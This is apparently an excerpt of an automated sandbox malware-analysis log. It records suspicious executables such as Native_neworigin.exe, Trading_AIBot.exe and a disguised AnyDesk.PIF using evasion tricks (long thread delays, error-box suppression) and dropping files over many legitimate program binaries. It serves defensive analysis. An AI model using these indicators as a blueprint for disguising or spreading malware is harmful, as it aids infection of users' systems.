                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02EBAB1C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,15_2_02EBAB1C
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Juqmtmya.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\aymtmquJ.pif Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeMemory allocated: 2C30000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeMemory allocated: 2F80000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeMemory allocated: 2C30000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: C90000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: 2870000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: DB0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: 5E70000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: 2DE70000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeMemory allocated: 2C00000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeMemory allocated: 2E50000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeMemory allocated: 2C30000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1200000
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1199841
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1199722
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1199597
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1198821
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1198614
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1198392
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1198228
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1198072
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1197864
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1197704
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1197560
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1197387
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1197208
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1197052
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1196735
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1196096
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1195729
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1195572
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1195393
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1195265
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1195137
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1194990
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWindow / User API: threadDelayed 3172
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWindow / User API: threadDelayed 1615
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4613
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\pingsender.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXEJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\7-Zip\7z.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeDropped PE file which has not been started: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\chrmstp.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\7-Zip\7zG.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\setup.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\firefox.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\updater.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeDropped PE file which has not been started: C:\Windows\System32\FXSSVC.exeJump to dropped file
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.134\elevation_service.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXEJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\7-Zip\7zFM.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Install\{6BB58CDD-A64E-41C8-8D92-79A516D3D118}\117.0.5938.134_117.0.5938.132_chrome_updater.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.134\notification_helper.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXEJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.134\chrome_pwa_launcher.exe
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
